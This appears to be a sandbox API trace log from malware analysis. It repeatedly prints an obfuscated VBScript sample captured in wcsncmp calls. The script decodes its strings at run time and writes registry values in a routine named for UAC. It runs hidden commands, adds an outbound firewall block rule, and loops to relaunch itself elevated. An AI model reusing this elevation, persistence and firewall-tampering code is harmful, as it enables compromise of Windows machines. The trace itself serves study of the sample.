bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.965] wcsncmp (_String1="asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.965] wcsncmp (_String1="sc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.965] wcsncmp (_String1="c(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.965] wcsncmp (_String1="(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.965] wcsncmp (_String1="Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = 